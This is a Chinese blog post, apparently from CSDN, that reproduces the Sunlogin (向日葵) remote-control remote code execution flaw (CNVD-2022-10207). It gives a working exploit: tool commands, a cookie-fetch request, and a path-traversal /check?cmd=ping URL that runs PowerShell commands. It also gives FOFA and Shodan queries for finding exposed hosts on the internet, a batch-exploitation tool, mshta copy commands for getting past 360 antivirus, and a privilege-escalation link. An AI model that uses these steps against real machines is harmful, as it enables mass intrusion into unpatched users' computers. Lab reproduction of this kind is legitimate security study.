CNVD-2022-10207:向日葵RCE

最新推荐文章于 2024-06-21 09:43:05 发布
最新推荐文章于 2024-06-21 09:43:05 发布
阅读量669 收藏 1
点赞数 1
分类专栏: # 靶场 文章标签: 安全 网络 windows
原文链接:https://blog.csdn.net/chang113/article/details/125379703?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166908380216782429768952%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=166908380216782429768952&biz_id=0
版权

一:漏洞摘要

向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。

Sunlogin RCE 是漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于40000的端口号。

影响客户端版本:

  • 11.1.1
  • 10.3.0.27372
  • 11.0.0.33162

二:快速复现

操作系统:Windows 10

目标靶机IP地址:192.168.50.223

向日葵客户端版本:11.0.0.33162


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        向日葵漏洞版本下载:
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        链接:https://pan.baidu.com/s/1FuuCz3iPVhxwigTQs5T07g?
        
        pwd=dw7t 
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        提取码:dw7t

步骤一:在Windows 10中安装向日葵程序....并关闭系统防火墙...

步骤二:使用一下工具对其进行漏洞探测与利用...


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###工具项目地址
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        https://github.com/Mr-xn/sunlogin_rce
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###漏洞探测
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        xrkRce.exe -h 192.168.50.223 -t scan
       
       
    
      
      
  6. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  7. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###漏洞利用
       
       
    
      
      
  8. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        xrkRce.exe -h 192.168.50.223 -t rce -p 49843 -c 
        
        "whoami"

三:手工复现

基于以上环境进行测试....

步骤一:使用工具对目标进行端口扫描....使用一下命令进行访问测试发现49843端口比较可疑....

curl 192.168.50.223:48943

步骤二:浏览器访问以下地址,获取其Cookie值..


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###示例
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ip+端口号+cgi-bin/rpc?action=verify-haras
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###拼接访问
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        http://192.168.50.223:49843/cgi-bin/rpc?action=verify-haras
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###Cookie信息
       
       
    
      
      
  6. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        PEYMEjYeyKrFKyNqn18536BWNYfLDz25

步骤三:访问以下地址并使用BP抓包在其添加上Cookie信息,进行漏洞验证...


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###Get URL
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        http:
        
        //
        
        192.168.
        
        50.223:
        
        49843/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%
        
        2Fwindows%2Fsystem32%
        
        2FWindowsPowerShell%2Fv1.
        
        0%2Fpowershell.exe+%20whoami
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###Cookie Info
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        Cookie:CID=PEYMEjYeyKrFKyNqn18536BWNYfLDz25

步骤四:漏洞原理....

当向日葵客户端在windows运行时,会连接远程Oray的服务器,开放对外接口,接口由sunlogin处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check处,当cmd的值为ping/nslookup开头时触发。

四:批量利用

步骤一:使用shodan进行资产搜索...并到处数据到TXT文本中...


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        fofa:body=
        
        "Verification failure" && port=
        
        "49155"
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        shodan:http.html:
        
        "Verification failure" port:>
        
        40000
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
     
       
       
    
      
      
  4. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        ###注意
       
       
    
      
      
  5. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        由于shodan很少扫描收录高端口号。所以该结果并不准确。

步骤二:下载以下项目并部署好环境将以上的资产放入Target.txt中进行批量测试...

https://github.com/j2ekim/sunlogin_rce

步骤三:使用利用工具进行漏洞验证猜想....

后续利用:+360安全防护


    
    
  1. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        copy mshta.exe C
        
        :
        
        \ProgramData
        
        \ms.exe
       
       
    
      
      
  2. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        cmd 
        
        /
        
        c C
        
        :
        
        \ProgramData
        
        \ms.exe
       
       
    
      
      
  3. 
      
      
    
       
       
    
      
      
    
      
      
    
       
       
    
        
        cmd 
        
        /
        
        c C
        
        :
        
        \ProgramData
        
        \ms.exe

五:提权利用

https://github.com/Ryze-T/CNVD-2022-10270-LPE

参考文章:

zxl2605
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
向日葵CNVD-2022-10207安装包
01-25
标题中的“向日葵CNVD-2022-10207安装包”指的是一个针对名为“向日葵”的远程控制软件的安全补丁或更新包,与CNVD(中国国家信息安全漏洞库)编号2022-10207相关。这通常意味着该安装包修复了向日葵软件中发现的一...
向日葵RCE命令执行(Windows <=11.0.0.33)
热门推荐
m0_52400001的博客
02-16 1万+
前言 向日葵个人版企业版均受影响 for Windows <=11.0.0.33 SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce 一、话不多说开始复现 这里用的是 vm虚拟机安装的win10系统 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以哦 3. 打开之后会自动开启一个端
远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决
Gjqhs的博客
03-01 3337
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 实验环境 :win10虚拟机 工具下载(含有漏洞版本的向日葵):https://github.com/Mr-xn/sunlog...
**标题**: 探索SunloginRCE:高效、精准的向日葵RCE漏洞扫描与利用利器
最新发布
gitblog_00031的博客
06-21 366
标题: 探索SunloginRCE:高效、精准的向日葵RCE漏洞扫描与利用利器 项目地址:https://gitcode.com/ce-automne/SunloginRCE 项目介绍 欢迎来到SunloginRCE的世界,一款专为网络安全专家设计的强大工具。它聚焦于向日葵远程控制软件11.x版本中存在的远程代码执行(RCE)漏洞,旨在提供一个高效率、功能全面的解决方案,帮助你在内部网络中快速定...
向日葵漏洞复现(含批量验证poc)(1),2024年最新网络安全程序员怎么优雅迈过30K+这道坎
时间与思念
04-16 419
可以走的很快,但一群人才能走的更远!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
向日葵RCE
m0_64338211的博客
03-01 2020
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以 3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip) 4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试 5. 拿到CID-添加paylo..
向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现
Boom!脑洞大爆炸的博客
07-07 1449
向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
向日葵漏洞扫描工具 CNVD-2022-10270
03-05
向日葵漏洞扫描工具
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
CNVD-2021-10543:CNVD-2021-10543:MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞
03-25
CNVD-2021-10543 CNVD-2021-10543:MessageSolution企业邮件扩展管理系统EEA存在信息扩展漏洞#使用python3 CNVD-2021-10543.py
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
CNVD-C-2019-48814:CNVD-C-2019-48814 Weblogic wls9_async_response反序列化利用工具
03-16
CNVD-C-2019-48814
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
复现向日葵远程代码执行漏洞
weixin_53440207的博客
02-27 1527
复现向日葵远程代码执行漏洞
某钉RCE & 某葵RCE 复现
weixin_48421613的博客
02-17 3527
某钉RCE 影响版本 ​6.3.5​ poc dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true ​本地使用hsf搭建服务 4. ​下载受漏洞影响的版本 链接:https://pan.baidu.com/s/1ozrwoqjzwASgONavgc94OQ ​ 提取码:9bcw 公众号回复 hfs 即可获取该工具 登录该版本某钉之后,直接发送poc而后点击即可触发​ 当然了,修复
向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
我了解豹女就像农民伯伯了解大米
03-19 1225
目录 漏洞描述: 工具复现: CS服务器上线:(失败) 漏洞描述: 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 工具复现: 同一局域网: 攻击机:172.5
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值